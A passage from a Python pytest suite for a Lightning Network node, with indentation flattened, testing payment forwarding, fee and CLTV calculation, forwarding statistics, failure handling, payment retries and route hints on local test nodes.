sat_per_btc = 10**8
assert(b11['msatoshi'] == 7 * sat_per_btc * 1000)
with pytest.raises(RpcError):
l1.rpc.decodepay('1111111')
@pytest.mark.developer("Too slow without --dev-fast-gossip")
def test_forward(node_factory, bitcoind):
# Connect 1 -> 2 -> 3.
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
# If they're at different block heights we can get spurious errors.
sync_blockheight(bitcoind, [l1, l2, l3])
chanid1 = only_one(l1.rpc.getpeer(l2.info['id'])['channels'])['short_channel_id']
chanid2 = only_one(l2.rpc.getpeer(l3.info['id'])['channels'])['short_channel_id']
assert only_one(l2.rpc.getpeer(l1.info['id'])['channels'])['short_channel_id'] == chanid1
assert only_one(l3.rpc.getpeer(l2.info['id'])['channels'])['short_channel_id'] == chanid2
rhash = l3.rpc.invoice(100000000, 'testpayment1', 'desc')['payment_hash']
assert only_one(l3.rpc.listinvoices('testpayment1')['invoices'])['status'] == 'unpaid'
# Fee for node2 is 10 millionths, plus 1.
amt = 100000000
fee = amt * 10 // 1000000 + 1
baseroute = [{'msatoshi': amt + fee,
'id': l2.info['id'],
'delay': 12,
'channel': chanid1},
{'msatoshi': amt,
'id': l3.info['id'],
'delay': 6,
'channel': chanid2}]
# Unknown other peer
route = copy.deepcopy(baseroute)
route[1]['id'] = '031a8dc444e41bb989653a4501e11175a488a57439b0c4947704fd6e3de5dca607'
l1.rpc.sendpay(route, rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Delay too short (we always add one internally anyway, so subtract 2 here).
route = copy.deepcopy(baseroute)
route[0]['delay'] = 8
l1.rpc.sendpay(route, rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Final delay too short
route = copy.deepcopy(baseroute)
route[1]['delay'] = 3
l1.rpc.sendpay(route, rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# This one works
route = copy.deepcopy(baseroute)
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
@pytest.mark.developer("needs --dev-fast-gossip")
def test_forward_different_fees_and_cltv(node_factory, bitcoind):
# FIXME: Check BOLT quotes here too
# BOLT #7:
# ```
# B
# / \
# / \
# A C
# \ /
# \ /
# D
# ```
#
# Each advertises the following `cltv_expiry_delta` on its end of every
# channel:
#
# 1. A: 10 blocks
# 2. B: 20 blocks
# 3. C: 30 blocks
# 4. D: 40 blocks
#
# C also uses a minimum `cltv_expiry` of 9 (the default) when requesting
# payments.
#
# Also, each node has the same fee scheme which it uses for each of its
# channels:
#
# 1. A: 100 base + 1000 millionths
# 1. B: 200 base + 2000 millionths
# 1. C: 300 base + 3000 millionths
# 1. D: 400 base + 4000 millionths
# We don't do D yet.
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'cltv-delta': 10, 'fee-base': 100, 'fee-per-satoshi': 1000},
{'cltv-delta': 20, 'fee-base': 200, 'fee-per-satoshi': 2000},
{'cltv-delta': 30, 'cltv-final': 9, 'fee-base': 300, 'fee-per-satoshi': 3000}])
ret = l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert ret['id'] == l2.info['id']
l1.daemon.wait_for_log('Handed peer, entering loop')
l2.daemon.wait_for_log('Handed peer, entering loop')
ret = l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
assert ret['id'] == l3.info['id']
l2.daemon.wait_for_log('Handed peer, entering loop')
l3.daemon.wait_for_log('Handed peer, entering loop')
c1, _ = l1.fundchannel(l2, 10**6)
c2, _ = l2.fundchannel(l3, 10**6)
bitcoind.generate_block(5)
# Make sure l1 has seen announce for all channels.
l1.wait_channel_active(c1)
l1.wait_channel_active(c2)
# BOLT #7:
#
# If B were to send 4,999,999 millisatoshi directly to C, it wouldn't
# charge itself a fee nor add its own `cltv_expiry_delta`, so it would
# use C's requested `cltv_expiry` of 9. We also assume it adds a
# "shadow route" to give an extra CLTV of 42. It could also add extra
# cltv deltas at other hops, as these values are a minimum, but we don't
# here for simplicity:
# FIXME: Add shadow route
shadow_route = 0
route = l2.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 1
# BOLT #7:
#
# * `amount_msat`: 4999999
# * `cltv_expiry`: current-block-height + 9 + 42
# * `onion_routing_packet`:
# * `amt_to_forward` = 4999999
# * `outgoing_cltv_value` = current-block-height + 9 + 42
#
assert route[0]['msatoshi'] == 4999999
assert route[0]['delay'] == 9 + shadow_route
# BOLT #7:
# If A were to send 4,999,999 millisatoshi to C via B, it needs to
# pay B the fee it specified in the B->C `channel_update`, calculated as
# per [HTLC Fees](#htlc_fees):
#
# 200 + 4999999 * 2000 / 1000000 = 10199
#
# Similarly, it would need to add the `cltv_expiry` from B->C's
# `channel_update` (20), plus C's requested minimum (9), plus 42 for the
# "shadow route". Thus the `update_add_htlc` message from A to B would
# be:
#
# * `amount_msat`: 5010198
# * `cltv_expiry`: current-block-height + 20 + 9 + 42
# * `onion_routing_packet`:
# * `amt_to_forward` = 4999999
# * `outgoing_cltv_value` = current-block-height + 9 + 42
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5010198
assert route[0]['delay'] == 20 + 9 + shadow_route
assert route[1]['msatoshi'] == 4999999
assert route[1]['delay'] == 9 + shadow_route
rhash = l3.rpc.invoice(4999999, 'test_forward_different_fees_and_cltv', 'desc')['payment_hash']
assert only_one(l3.rpc.listinvoices('test_forward_different_fees_and_cltv')['invoices'])['status'] == 'unpaid'
# This should work.
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
# We add one to the blockcount for a bit of fuzz (FIXME: Shadowroute would fix this!)
shadow_route = 1
l1.daemon.wait_for_log("Adding HTLC 0 amount=5010198msat cltv={} gave CHANNEL_ERR_ADD_OK"
.format(bitcoind.rpc.getblockcount() + 20 + 9 + shadow_route))
l2.daemon.wait_for_log("Adding HTLC 0 amount=4999999msat cltv={} gave CHANNEL_ERR_ADD_OK"
.format(bitcoind.rpc.getblockcount() + 9 + shadow_route))
l3.daemon.wait_for_log("Resolved invoice 'test_forward_different_fees_and_cltv' with amount 4999999msat")
assert only_one(l3.rpc.listinvoices('test_forward_different_fees_and_cltv')['invoices'])['status'] == 'paid'
# Check that we see all the channels
shortids = set(c['short_channel_id'] for c in l2.rpc.listchannels()['channels'])
for scid in shortids:
c = l1.rpc.listchannels(scid)['channels']
# We get one entry for each direction.
assert len(c) == 2
assert c[0]['short_channel_id'] == scid
assert c[1]['short_channel_id'] == scid
assert c[0]['source'] == c[1]['destination']
assert c[1]['source'] == c[0]['destination']
@pytest.mark.developer("too slow without --dev-fast-gossip")
def test_forward_pad_fees_and_cltv(node_factory, bitcoind):
"""Test that we are allowed extra locktime delta, and fees"""
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'cltv-delta': 10, 'fee-base': 100, 'fee-per-satoshi': 1000},
{'cltv-delta': 20, 'fee-base': 200, 'fee-per-satoshi': 2000},
{'cltv-delta': 30, 'cltv-final': 9, 'fee-base': 300, 'fee-per-satoshi': 3000}])
ret = l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert ret['id'] == l2.info['id']
l1.daemon.wait_for_log('Handed peer, entering loop')
l2.daemon.wait_for_log('Handed peer, entering loop')
ret = l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
assert ret['id'] == l3.info['id']
l2.daemon.wait_for_log('Handed peer, entering loop')
l3.daemon.wait_for_log('Handed peer, entering loop')
c1, _ = l1.fundchannel(l2, 10**6)
c2, _ = l2.fundchannel(l3, 10**6)
bitcoind.generate_block(5)
# Make sure l1 has seen announce for all channels.
l1.wait_channel_active(c1)
l1.wait_channel_active(c2)
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5010198
assert route[0]['delay'] == 20 + 9
assert route[1]['msatoshi'] == 4999999
assert route[1]['delay'] == 9
# Modify so we overpay, overdo the cltv.
route[0]['msatoshi'] += 2000
route[0]['amount_msat'] = Millisatoshi(route[0]['msatoshi'])
route[0]['delay'] += 20
route[1]['msatoshi'] += 1000
route[1]['amount_msat'] = Millisatoshi(route[1]['msatoshi'])
route[1]['delay'] += 10
# This should work.
rhash = l3.rpc.invoice(4999999, 'test_forward_pad_fees_and_cltv', 'desc')['payment_hash']
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
assert only_one(l3.rpc.listinvoices('test_forward_pad_fees_and_cltv')['invoices'])['status'] == 'paid'
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
def test_forward_stats(node_factory, bitcoind):
"""Check that we track forwarded payments correctly.
We wire up the network to have l1 as payment initiator, l2 as
forwarded (the one we check) and l3-l5 as payment recipients. l3
accepts correctly, l4 rejects (because it doesn't know the payment
hash) and l5 will keep the HTLC dangling by disconnecting.
"""
amount = 10**5
l1, l2, l3, l4, l5 = node_factory.get_nodes(5, opts=[{}] * 4 + [{'may_fail': True}])
node_factory.join_nodes([l1, l2, l3], wait_for_announce=False)
l2.openchannel(l4, 10**6, wait_for_announce=False)
l2.openchannel(l5, 10**6, wait_for_announce=False)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4, l5])
bitcoind.generate_block(5)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 8)
payment_hash = l3.rpc.invoice(amount, "first", "desc")['payment_hash']
route = l1.rpc.getroute(l3.info['id'], amount, 1)['route']
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
# l4 rejects since it doesn't know the payment_hash
route = l1.rpc.getroute(l4.info['id'], amount, 1)['route']
payment_hash = "F" * 64
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
# l5 will hold the HTLC hostage.
l5.rpc.dev_ignore_htlcs(id=l2.info['id'], ignore=True)
route = l1.rpc.getroute(l5.info['id'], amount, 1)['route']
payment_hash = l5.rpc.invoice(amount, "first", "desc")['payment_hash']
l1.rpc.sendpay(route, payment_hash)
l5.daemon.wait_for_log(r'their htlc .* dev_ignore_htlcs')
# Select all forwardings, ordered by htlc_id to ensure the order
# matches below
forwardings = l2.db_query("SELECT *, in_msatoshi - out_msatoshi as fee "
"FROM forwarded_payments "
"ORDER BY in_htlc_id;")
assert(len(forwardings) == 3)
states = [f['state'] for f in forwardings]
assert(states == [1, 2, 0]) # settled, failed, offered
inchan = l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'][0]
outchan = l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]
# Check that we correctly account channel changes
assert inchan['in_payments_offered'] == 3
assert inchan['in_payments_fulfilled'] == 1
assert inchan['in_msatoshi_offered'] >= 3 * amount
assert inchan['in_msatoshi_fulfilled'] >= amount
assert outchan['out_payments_offered'] == 1
assert outchan['out_payments_fulfilled'] == 1
assert outchan['out_msatoshi_offered'] >= amount
assert outchan['out_msatoshi_offered'] == outchan['out_msatoshi_fulfilled']
assert outchan['out_msatoshi_fulfilled'] < inchan['in_msatoshi_fulfilled']
stats = l2.rpc.listforwards()
assert [f['status'] for f in stats['forwards']] == ['settled', 'failed', 'offered']
assert l2.rpc.getinfo()['msatoshi_fees_collected'] == 1 + amount // 100000
assert l1.rpc.getinfo()['msatoshi_fees_collected'] == 0
assert l3.rpc.getinfo()['msatoshi_fees_collected'] == 0
assert stats['forwards'][0]['received_time'] <= stats['forwards'][0]['resolved_time']
assert stats['forwards'][1]['received_time'] <= stats['forwards'][1]['resolved_time']
assert 'received_time' in stats['forwards'][2] and 'resolved_time' not in stats['forwards'][2]
@pytest.mark.developer("too slow without --dev-fast-gossip")
@pytest.mark.slow_test
def test_forward_local_failed_stats(node_factory, bitcoind, executor):
"""Check that we track forwarded payments correctly.
We wire up the network to have l1 and l6 as payment initiator, l2 as
forwarded (the one we check) and l3-l5 as payment recipients.
There 5 cases for FORWARD_LOCAL_FAILED status:
1. When Msater resolves the reply about the next peer infor(sent
by Gossipd), and need handle unknown next peer failure in
channel_resolve_reply(). For this case, we ask l1 pay to l3
through l2 but close the channel between l2 and l3 after
getroute(), the payment will fail in l2 because of
WIRE_UNKNOWN_NEXT_PEER;
2. When Master handle the forward process with the htlc_in and
the id of next hop, it tries to drive a new htlc_out but fails
in forward_htlc(). For this case, we ask l1 pay to 14 through
with no fee, so the payment will fail in l2 becase of
WIRE_FEE_INSUFFICIENT;
3. When we send htlc_out, Master asks Channeld to add a new htlc
into the outgoing channel but Channeld fails. Master need
handle and store this failure in rcvd_htlc_reply(). For this
case, we ask l1 pay to l5 with 10**8 sat though the channel
(l2-->l5) with the max capacity of 10**4 msat , the payment
will fail in l2 because of CHANNEL_ERR_MAX_HTLC_VALUE_EXCEEDED;
4. When Channeld receives a new revoke message, if the state of
corresponding htlc is RCVD_ADD_ACK_REVOCATION, Master will tries
to resolve onionpacket and handle the failure before resolving
the next hop in peer_got_revoke(). For this case, we ask l6 pay
to l4 though l1 and l2, but we replace the second node_id in route
with the wrong one, so the payment will fail in l2 because of
WIRE_INVALID_ONION_KEY;
5. When Onchaind finds the htlc time out or missing htlc, Master
need handle these failure as FORWARD_LOCAL_FAILED in if it's forward
payment case. For this case, we ask l1 pay to l4 though l2 with the
amount less than the invoice(the payment must fail in l4), and we
also ask l5 disconnected before sending update_fail_htlc, so the
htlc will be holding until l2 meets timeout and handle it as local_fail.
"""
amount = 10**8
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2, l3, l4, l5, l6 = node_factory.get_nodes(6, opts=[{},
{},
{},
{'disconnect': disconnects},
{},
{}])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.connect(l4.info['id'], 'localhost', l4.port)
l2.rpc.connect(l5.info['id'], 'localhost', l5.port)
l6.rpc.connect(l1.info['id'], 'localhost', l1.port)
c12, _ = l1.fundchannel(l2, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
c24, _ = l2.fundchannel(l4, 10**6)
c25, _ = l2.fundchannel(l5, 10**4 * 3)
l6.fundchannel(l1, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
l1.wait_channel_active(c24)
l1.wait_channel_active(c25)
l6.wait_channel_active(c24)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 10)
"""1. When Msater resolves the reply about the next peer infor(sent
by Gossipd), and need handle unknown next peer failure in
channel_resolve_reply();
For this case, we ask l1 pay to l3 through l2 but close the channel
between l2 and l3 after getroute(), the payment will fail in l2
because of WIRE_UNKNOWN_NEXT_PEER;
"""
payment_hash = l3.rpc.invoice(amount, "first", "desc")['payment_hash']
route = l1.rpc.getroute(l3.info['id'], amount, 1)['route']
l2.rpc.close(c23, 1)
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
"""2. When Master handle the forward process with the htlc_in and
the id of next hop, it tries to drive a new htlc_out but fails
in forward_htlc();
For this case, we ask l1 pay to 14 through with no fee, so the
payment will fail in l2 becase of WIRE_FEE_INSUFFICIENT;
"""
payment_hash = l4.rpc.invoice(amount, "third", "desc")['payment_hash']
fee = amount * 10 // 1000000 + 1
route = [{'msatoshi': amount,
'id': l2.info['id'],
'delay': 12,
'channel': c12},
{'msatoshi': amount,
'id': l4.info['id'],
'delay': 6,
'channel': c24}]
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
"""3. When we send htlc_out, Master asks Channeld to add a new htlc
into the outgoing channel but Channeld fails. Master need
handle and store this failure in rcvd_htlc_reply();
For this case, we ask l1 pay to l5 with 10**8 sat though the channel
(l2-->l5) with the max capacity of 10**4 msat , the payment will
fail in l2 because of CHANNEL_ERR_MAX_HTLC_VALUE_EXCEEDED;
"""
payment_hash = l5.rpc.invoice(amount, "second", "desc")['payment_hash']
fee = amount * 10 // 1000000 + 1
route = [{'msatoshi': amount + fee,
'id': l2.info['id'],
'delay': 12,
'channel': c12},
{'msatoshi': amount,
'id': l5.info['id'],
'delay': 6,
'channel': c25}]
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
"""4. When Channeld receives a new revoke message, if the state of
corresponding htlc is RCVD_ADD_ACK_REVOCATION, Master will tries
to resolve onionpacket and handle the failure before resolving
the next hop in peer_got_revoke();
For this case, we ask l6 pay to l4 though l1 and l2, but we replace
the second node_id in route with the wrong one, so the payment will
fail in l2 because of WIRE_INVALID_ONION_KEY;
"""
payment_hash = l4.rpc.invoice(amount, 'fourth', 'desc')['payment_hash']
route = l6.rpc.getroute(l4.info['id'], amount, 1)['route']
mangled_nodeid = '0265b6ab5ec860cd257865d61ef0bbf5b3339c36cbda8b26b74e7f1dca490b6510'
# Replace id with a different pubkey, so onion encoded badly at l2 hop.
route[1]['id'] = mangled_nodeid
with pytest.raises(RpcError):
l6.rpc.sendpay(route, payment_hash)
l6.rpc.waitsendpay(payment_hash)
"""5. When Onchaind finds the htlc time out or missing htlc, Master
need handle these failure as FORWARD_LOCAL_FAILED in if it's forward
payment case.
For this case, we ask l1 pay to l4 though l2 with the amount less than
the invoice(the payment must fail in l4), and we also ask l5 disconnected
before sending update_fail_htlc, so the htlc will be holding until l2
meets timeout and handle it as local_fail.
"""
payment_hash = l4.rpc.invoice(amount, 'onchain_timeout', 'desc')['payment_hash']
fee = amount * 10 // 1000000 + 1
# We underpay, so it fails.
route = [{'msatoshi': amount + fee - 1,
'id': l2.info['id'],
'delay': 12,
'channel': c12},
{'msatoshi': amount - 1,
'id': l4.info['id'],
'delay': 5,
'channel': c24}]
executor.submit(l1.rpc.sendpay, route, payment_hash)
l4.daemon.wait_for_log('permfail')
l4.wait_for_channel_onchain(l2.info['id'])
l2.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l4.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l2.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l4.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
# give time to let l2 store the local_failed stats
time.sleep(5)
# Select all forwardings, and check the status
stats = l2.rpc.listforwards()
assert [f['status'] for f in stats['forwards']] == ['local_failed', 'local_failed', 'local_failed', 'local_failed', 'local_failed']
assert l2.rpc.getinfo()['msatoshi_fees_collected'] == 0
assert 'received_time' in stats['forwards'][0] and 'resolved_time' not in stats['forwards'][0]
assert 'received_time' in stats['forwards'][1] and 'resolved_time' not in stats['forwards'][1]
assert 'received_time' in stats['forwards'][2] and 'resolved_time' not in stats['forwards'][2]
assert 'received_time' in stats['forwards'][3] and 'resolved_time' not in stats['forwards'][3]
assert 'received_time' in stats['forwards'][3] and 'resolved_time' not in stats['forwards'][4]
@pytest.mark.developer("too slow without --dev-fast-gossip")
@pytest.mark.slow_test
def test_htlcs_cltv_only_difference(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4
# l4 ignores htlcs, so they stay.
# l3 will see a reconnect from l4 when l4 restarts.
l1, l2, l3, l4 = node_factory.line_graph(4, wait_for_announce=True, opts=[{}] * 2 + [{'dev-no-reconnect': None, 'may_reconnect': True}] * 2)
h = l4.rpc.invoice(msatoshi=10**8, label='x', description='desc')['payment_hash']
l4.rpc.dev_ignore_htlcs(id=l3.info['id'], ignore=True)
# L2 tries to pay
r = l2.rpc.getroute(l4.info['id'], 10**8, 1)["route"]
l2.rpc.sendpay(r, h)
# Now increment CLTV
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# L1 tries to pay
r = l1.rpc.getroute(l4.info['id'], 10**8, 1)["route"]
l1.rpc.sendpay(r, h)
# Now increment CLTV
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# L3 tries to pay
r = l3.rpc.getroute(l4.info['id'], 10**8, 1)["route"]
l3.rpc.sendpay(r, h)
# Give them time to go through.
time.sleep(5)
# Will all be connected OK.
assert only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected']
assert only_one(l2.rpc.listpeers(l3.info['id'])['peers'])['connected']
assert only_one(l3.rpc.listpeers(l4.info['id'])['peers'])['connected']
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
l4.daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
# Restarting tail node will stop it ignoring HTLCs (it will actually
# fail them immediately).
l4.restart()
l3.rpc.connect(l4.info['id'], 'localhost', l4.port)
wait_for(lambda: only_one(l1.rpc.listsendpays()['payments'])['status'] == 'failed')
wait_for(lambda: only_one(l2.rpc.listsendpays()['payments'])['status'] == 'failed')
wait_for(lambda: only_one(l3.rpc.listsendpays()['payments'])['status'] == 'failed')
# Should all still be connected.
assert only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected']
assert only_one(l2.rpc.listpeers(l3.info['id'])['peers'])['connected']
assert only_one(l3.rpc.listpeers(l4.info['id'])['peers'])['connected']
def test_pay_variants(node_factory):
l1, l2 = node_factory.line_graph(2)
# Upper case is allowed
b11 = l2.rpc.invoice(123000, 'test_pay_variants upper', 'description')['bolt11'].upper()
l1.rpc.decodepay(b11)
l1.rpc.pay(b11)
# lightning: prefix is allowed
b11 = 'lightning:' + l2.rpc.invoice(123000, 'test_pay_variants with prefix', 'description')['bolt11']
l1.rpc.decodepay(b11)
l1.rpc.pay(b11)
# BOTH is allowed.
b11 = 'LIGHTNING:' + l2.rpc.invoice(123000, 'test_pay_variants upper with prefix', 'description')['bolt11'].upper()
l1.rpc.decodepay(b11)
l1.rpc.pay(b11)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
@pytest.mark.slow_test
def test_pay_retry(node_factory, bitcoind, executor, chainparams):
"""Make sure pay command retries properly. """
def exhaust_channel(opener, peer, scid, already_spent=0):
"""Spend all available capacity (10^6 - 1%) of channel
"""
peer_node = opener.rpc.listpeers(peer.info['id'])['peers'][0]
chan = peer_node['channels'][0]
maxpay = chan['spendable_msatoshi']
lbl = ''.join(random.choice(string.ascii_letters) for _ in range(20))
inv = peer.rpc.invoice(maxpay, lbl, "exhaust_channel")
routestep = {
'msatoshi': maxpay,
'id': peer.info['id'],
'delay': 10,
'channel': scid
}
opener.rpc.sendpay([routestep], inv['payment_hash'])
opener.rpc.waitsendpay(inv['payment_hash'])
# We connect every node to l5; in a line and individually.
# Keep fixed fees so we can easily calculate exhaustion
l1, l2, l3, l4, l5 = node_factory.line_graph(5, fundchannel=False,
opts={'feerates': (7500, 7500, 7500, 7500), 'disable-mpp': None})
# scid12
l1.fundchannel(l2, 10**6, wait_for_active=False)
# scid23
l2.fundchannel(l3, 10**6, wait_for_active=False)
# scid34
l3.fundchannel(l4, 10**6, wait_for_active=False)
scid45, _ = l4.fundchannel(l5, 10**6, wait_for_active=False)
l1.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid15, _ = l1.fundchannel(l5, 10**6, wait_for_active=False)
l2.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid25, _ = l2.fundchannel(l5, 10**6, wait_for_active=False)
l3.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid35, _ = l3.fundchannel(l5, 10**6, wait_for_active=False)
# Make sure l1 sees all 7 channels
bitcoind.generate_block(5)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 14)
# Exhaust shortcut channels one at a time, to force retries.
exhaust_channel(l1, l5, scid15)
exhaust_channel(l2, l5, scid25)
exhaust_channel(l3, l5, scid35)
def listpays_nofail(b11):
while True:
pays = l1.rpc.listpays(b11)['pays']
if len(pays) != 0:
if only_one(pays)['status'] == 'complete':
return
assert only_one(pays)['status'] != 'failed'
inv = l5.rpc.invoice(10**8, 'test_retry', 'test_retry')
# Make sure listpays doesn't transiently show failure while pay
# is retrying.
fut = executor.submit(listpays_nofail, inv['bolt11'])
# Pay l1->l5 should succeed via straight line (eventually)
l1.rpc.dev_pay(inv['bolt11'], use_shadow=False)
# This should be OK.
fut.result()
# This should make it fail.
exhaust_channel(l4, l5, scid45, 10**8)
# It won't try l1->l5, since it knows that's under capacity.
# It will try l1->l2->l5, which fails.
# It will try l1->l2->l3->l5, which fails.
# It will try l1->l2->l3->l4->l5, which fails.
# Finally, fails to find a route.
inv = l5.rpc.invoice(10**8, 'test_retry2', 'test_retry2')['bolt11']
with pytest.raises(RpcError, match=r'4 attempts'):
l1.rpc.dev_pay(inv, use_shadow=False)
@pytest.mark.developer("needs DEVELOPER=1 otherwise gossip takes 5 minutes!")
@pytest.mark.slow_test
def test_pay_routeboost(node_factory, bitcoind, compat):
"""Make sure we can use routeboost information. """
# l1->l2->l3--private-->l4
l1, l2 = node_factory.line_graph(2, announce_channels=True, wait_for_announce=True)
l3, l4, l5 = node_factory.line_graph(3, announce_channels=False, wait_for_announce=False)
# This should a "could not find a route" because that's true.
error = r'Destination [a-f0-9]{66} is not reachable directly and all routehints were unusable'
with pytest.raises(RpcError, match=error):
l1.rpc.pay(l5.rpc.invoice(10**8, 'test_retry', 'test_retry')['bolt11'])
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
scidl2l3, _ = l2.fundchannel(l3, 10**6)
# Make sure l1 knows about the 2->3 channel.
bitcoind.generate_block(5)
l1.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scidl2l3),
r'update for channel {}/1 now ACTIVE'
.format(scidl2l3)])
# Make sure l4 knows about 2->3 channel too so it's not a dead-end.
l4.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scidl2l3),
r'update for channel {}/1 now ACTIVE'
.format(scidl2l3)])
# Get an l4 invoice; it should put the private channel in routeboost.
inv = l4.rpc.invoice(10**5, 'test_pay_routeboost', 'test_pay_routeboost',
exposeprivatechannels=True)
assert 'warning_capacity' not in inv
assert 'warning_offline' not in inv
assert only_one(only_one(l1.rpc.decodepay(inv['bolt11'])['routes']))
# Now we should be able to pay it.
l1.rpc.dev_pay(inv['bolt11'], use_shadow=False)
# Status should show all the gory details.
status = l1.rpc.call('paystatus', [inv['bolt11']])
assert only_one(status['pay'])['bolt11'] == inv['bolt11']
assert only_one(status['pay'])['amount_msat'] == Millisatoshi(10**5)
assert only_one(status['pay'])['destination'] == l4.info['id']
assert 'label' not in only_one(status['pay'])
assert 'routehint_modifications' not in only_one(status['pay'])
assert 'local_exclusions' not in only_one(status['pay'])
attempts = only_one(status['pay'])['attempts']
scid34 = only_one(l3.rpc.listpeers(l4.info['id'])['peers'])['channels'][0]['short_channel_id']
assert(len(attempts) == 1)
a = attempts[0]
assert(a['strategy'] == "Initial attempt")
assert('success' in a)
assert('payment_preimage' in a['success'])
# With dev-route option we can test longer routehints.
if DEVELOPER:
scid45 = only_one(l4.rpc.listpeers(l5.info['id'])['peers'])['channels'][0]['short_channel_id']
routel3l4l5 = [{'id': l3.info['id'],
'short_channel_id': scid34,
'fee_base_msat': 1000,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6},
{'id': l4.info['id'],
'short_channel_id': scid45,
'fee_base_msat': 1000,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6}]
inv = l5.rpc.call('invoice', {'msatoshi': 10**5,
'label': 'test_pay_routeboost2',
'description': 'test_pay_routeboost2',
'dev-routes': [routel3l4l5]})
l1.rpc.dev_pay(inv['bolt11'], use_shadow=False)
status = l1.rpc.call('paystatus', [inv['bolt11']])
pay = only_one(status['pay'])
attempts = pay['attempts']
assert(len(attempts) == 1)
assert 'failure' not in attempts[0]
assert 'success' in attempts[0]
# Finally, it should fall back to second routehint if first fails.
# (Note, this is not public because it's not 6 deep)
l3.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid35, _ = l3.fundchannel(l5, 10**6)
l4.stop()
routel3l5 = [{'id': l3.info['id'],
'short_channel_id': scid35,
'fee_base_msat': 1000,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6}]
inv = l5.rpc.call('invoice', {'msatoshi': 10**5,
'label': 'test_pay_routeboost5',
'description': 'test_pay_routeboost5',
'dev-routes': [routel3l4l5, routel3l5]})
l1.rpc.dev_pay(inv['bolt11'], label="paying test_pay_routeboost5",
use_shadow=False)
status = l1.rpc.call('paystatus', [inv['bolt11']])
assert only_one(status['pay'])['bolt11'] == inv['bolt11']
assert only_one(status['pay'])['destination'] == l5.info['id']
assert only_one(status['pay'])['label'] == "paying test_pay_routeboost5"
assert 'routehint_modifications' not in only_one(status['pay'])
assert 'local_exclusions' not in only_one(status['pay'])
attempts = only_one(status['pay'])['attempts']
# First one fails, second one succeeds, no routehint would come last.
assert len(attempts) == 2
assert 'success' not in attempts[0]
assert 'success' in attempts[1]
# TODO Add assertion on the routehint once we add them to the pay
# output
@pytest.mark.developer("updates are delayed without --dev-fast-gossip")
def test_setchannelfee_usage(node_factory, bitcoind):
# TEST SETUP
#
# [l1] ---> [l2] (channel funded)
# |
# o - - > [l3] (only connected)
#
# - check initial SQL values
# - check setchannelfee can be used
# - checks command's return object format
# - check custom SQL fee values
# - check values in local nodes listchannels output
# - json throws exception on negative values
# - checks if peer id can be used instead of scid
# - checks fee_base_msat and fee_proportional_millionths in `listpeers` out
DEF_BASE = 10
